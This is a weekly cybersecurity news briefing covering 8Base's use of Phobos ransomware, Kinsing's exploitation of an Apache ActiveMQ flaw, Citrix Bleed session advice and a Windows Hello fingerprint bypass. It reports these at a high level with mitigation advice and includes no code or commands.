Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities.jpg)
Cyber Security Briefing, 18 - 24 November
8Base ransomware group uses Phobos variant
Cisco Talos has detected an increase in activity by cybercriminals using Phobos malware and the SmokeLoader Trojan to distribute it. They discovered that the 8Base group uses Phobos in its campaigns and hides it in encrypted payloads within SmokeLoader, which are decrypted and loaded into the process' memory.
8Base has been active since March 2022 and a sample of Phobos has been observed using the ".8base" extension for encrypted files, suggesting that 8Base may be a successor to Phobos or is using existing ransomware in its attacks. On the other hand, Cisco Talos has found that Phobos uses SmokeLoader to establish persistence, delete backups and encrypt files.
In addition, the malware uses encrypted keys to protect additional functions, allowing decryption of locked files. Phobos is a variant of the Dharma ransomware, which is centrally managed and sold as a service to other cybercriminals.
Kinsing exploits vulnerability in Apache ActiveMQ to attack Linux systems
TrendMicro researchers recently discovered that the Kinsing malware, also known as h2miner, is exploiting critical vulnerability CVE-2023-46604, CVSS 9.8, in Apache ActiveMQ to compromise Linux systems through remote code execution. Although the flaw was patched in October, many servers remain vulnerable, allowing arbitrary shell commands to be executed.
Kinsing, known primarily for targeting Linux systems, uses public exploits to download and execute malware, especially cryptocurrency miners, using the ProcessBuilder method, which allows it to execute malicious bash scripts and download additional payloads to the infected device from system-level processes, giving it flexibility and avoiding detection.
Before deploying the miner, Kinsing likewise removes competitors, and establishes persistence through a cronjob that retrieves the latest version of its infection script and adds a rootkit. Since the vulnerability is being actively exploited, the recommendation is to upgrade Apache Active MQ to specific versions to mitigate the threat.
Citrix requests to close all NetScaler sessions to prevent Citrix Bleed attack
Citrix has issued a note informing system administrators that to be protected from vulnerability CVE-2023-4966, known as Citrix Bleed, in addition to applying the patch released in October they should delete all previous user sessions and terminate all active ones, as threat actors have been stealing authentication tokens, allowing them to access compromised devices even after they have been patched.
Apropos of the exploit, CISA and the FBI have issued a joint advisory warning of active exploitation of this vulnerability by the LockBit ransomware group.
Windows Hello authentication on laptops can be bypassed
Fingerprint authentication on Dell, Lenovo and Microsoft laptops can be bypassed by attacking the fingerprint sensor chip.
Researchers at Blackwing Intelligence along with Microsoft's Offensive Research and Security Engineering (MORSE) explain how, by connecting the laptop to a USB hacking device or a purpose-built platform, they were able to carry out a man-in-the-middle attack and bypass Windows Hello authentication. In the case of the Lenovo ThinkPad T14s and Dell Inspiron 15 models, the legitimate ID was spoofed with an attacker's fingerprint, while on the Microsoft Surface Pro X, a device that tells the system that the attacker's user is authorized was connected.
Blackwing recommends that manufacturers enable Secure Device Connection Protocol (SDCP), as they found that on two of the three laptops this secure channel between the host and biometric devices was disabled.
Image from Freepik.
